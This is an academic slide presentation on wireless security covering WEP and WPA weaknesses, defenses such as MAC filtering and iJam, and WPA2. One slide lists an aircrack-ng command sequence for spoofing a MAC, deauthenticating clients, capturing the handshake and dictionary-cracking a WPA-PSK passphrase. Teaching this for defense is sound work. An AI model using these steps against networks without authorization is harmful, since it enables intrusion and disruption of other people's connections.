Made by: Chetan Sakpal, Hend Nuhait, Travis Atkison Presented by: Chetan Sakpal

workablejeansMobile - Wireless

Nov 21, 2013 (3 years and 4 months ago)

91 views

Made by:
Chetan

Sakpal
,
Hend

Nuhait
, Travis
Atkison

Presented by:
Chetan

Sakpal

Outline

1)
Objectives

2)
Wireless

Networks

and

Security

3)
WEP

and

problems

in

WEP

4)
WPA

and

problems

in

WPA

5)
The

Attack


6)
Defense

techniques

7)
WPA
2

8)
Conclusion


Objectives


Study

WPA
.


Find

a

way

to

attack

WPA
.


Finally,

find

some

techniques

to

defend

against

this

attack
.

Wireless Networks and Security

1) What are Wireless Networks?


A wireless network is the way that a computer is
connected to a router without a physical link.

2) Why do we need?


Facilitates mobility


You can use lengthy wires instead,
but someone might trip over them.

3) Why security?


Attacker may hack a victim’s personal computer and
steal his/her personal pictures and documents or may
perform some illegal activities or crimes using the
victim’s machine and ID.

Wireless Networks and Security

Three security approaches:

1.
WEP (Wired Equivalent Privacy)

2.
WPA (Wi
-
Fi Protected Access)

3.
WPA2 (Wi
-
Fi Protected Access, Version 2)


Each has two generations named Enterprise and Personal.

WEP and its problems


Designed to provide the security of a wired LAN by
encryption through use of the RC4 algorithm with two
side of a data communication.


Problems:

1)
Size of IV is short (24 bit) and reused

2)
Problem in the RC
-
4 algorithm

3)
Easy forging of authentication messages [1]

WPA


Enterprise WPA or Commercial WPA: Authentication is
made by an authentication server 802.1x, generating
control and security in the users' traffic of the wireless
network. No shared key.


Personal WPA or WPA
-
PSK (Pre
-
Shared Key): Avoids
the authentication server, uses encryption key only once
while initiating session, using a 4 way authentication.
[2]

Improvements:

1.
A cryptographic message integrity code, or MIC to
defeat forgeries.

2.
A new IV sequencing authority, avoids replay attack.

3.
A per
-
packet key mixing function, to de
-
correlate the
public IVs from weak keys.

4.
A rekeying mechanism, to provide fresh encryption and
integrity keys, undoing the threat of attacks stemming
from key reuse. [2]

Problem


Attacking a WPA
-
PSK network is possible.


Tools like WPA cracker and
Cowpatty

are available


Both perform a brute
-
force dictionary attack against
WPA
-
PSK networks in an attempt to determine the
shared passphrase [2]

The Attack

1.
airmon
-
ng

2.
macchanger

-
s [Interface]

3.
airodump
-
ng

[The hacker’s station interface]

4.
airodump
-
ng

--
bssid

[MAC of Router]

w
[FILENAME]
-
c [CHANNEL] [ADAPTER]

5.
aireplay
-
ng

-
0 15
-
a [MAC OF ROUTER]
-
c [MAC OF
SYSTEM ON NETWORK] [ADAPTER]

6.
aircrack
-
ng

-
e [ESSID
-

Name of network]

w
[WORDLIST] [FILENAME.cap]


Defense


None of the attack methods are faster or effective when
a larger passphrase is used.


Hide SSID


MAC filtering


maintain access control list


Not allowing MAC de
-
authentication


Letter
-
envelop protocol [4]


Stop attacker from acquiring client signals


iJam

[5]

iJAM


The sender repeats its transmission, For each sample in these repeated
transmissions, the receiver randomly jams either the sample in the original
transmission, or the corresponding sample in the repetition.


Since the eavesdropper does not know which signal sample is jammed and
which one is clean, it cannot correctly decode data.


In contrast, the receiver knows which samples it jammed. Thus, the
receiver can pick the correct samples from the signal and its repetition and
rearrange them to get a clean signal, which it can decode.

iJAM

features


It can be used in conjunction with existing wireless
security protocols (such as 802.11 WPA/WPA2) to
secure the session key establishment phase by
preventing an eavesdropper from overhearing the
critical handshake packets.


The bit error rate at an eavesdropper ranges from 40
-
60%.


Jamming has no impact on packet decode ability at the
intended receiver.


It is efficient.


Such a setup is already supported by various wireless
hardware. [5]

WPA2


WPA2, like WPA, supports two modes of security,
sometimes referred to as “home user” and “corporate.”


In “home user” mode a pre
-
shared secret is used, much
like WEP or WAP.


Use of AES for encryption is a good choice.


The “corporate” security is based on 802.1X, the EAP
authentication framework (including RADIUS), one of
several EAP types (such as EAP
-
TLS, which provides a
much stronger authentication system), and secure key
distribution.


“Home user” security introduces the same security
problems present in WEP and WPA
-
PSK. [3]

Conclusion


We show that WPA can also be attacked and we can
defend against such an attack by following the
approaches mentioned.

QUESTIONS?

References

1)
Wired Equivalent Privacy (WEP)


Arash

Habibi

Lashkari
,
Farnaz

Towhidi
,
Raheleh

Sadat
Hosseini



2009

2)
Wired Equivalent Privacy (WEP) versus Wi
-
Fi Protected Access
(WPA)
-

Arash

Habibi

Lashkari
,
Masood

Mansoori
, Amir,
Seyed

Danesh



2009

3)
A Survey on Wireless Security protocols (WEP,WPA and
WPA2/802.11i)
-

Arash

Habibi

Lashkari
, Mir Mohammad
Seyed

Danesh
,
Behrang

Samadi



2009

4)
A lightweight solution for defending against de
-
authentication /
disassociation attacks on 802.11 networks
-

Thuc

D. Nguyen,
Duc

H. M. Nguyen,
Bao

N. Tran,
Hai

Vu,
Neeraj

Mittal

5)
iJam
: Jamming Oneself for Secure Wireless Communication
-

Shyamnath Gollakota and Dina Katabi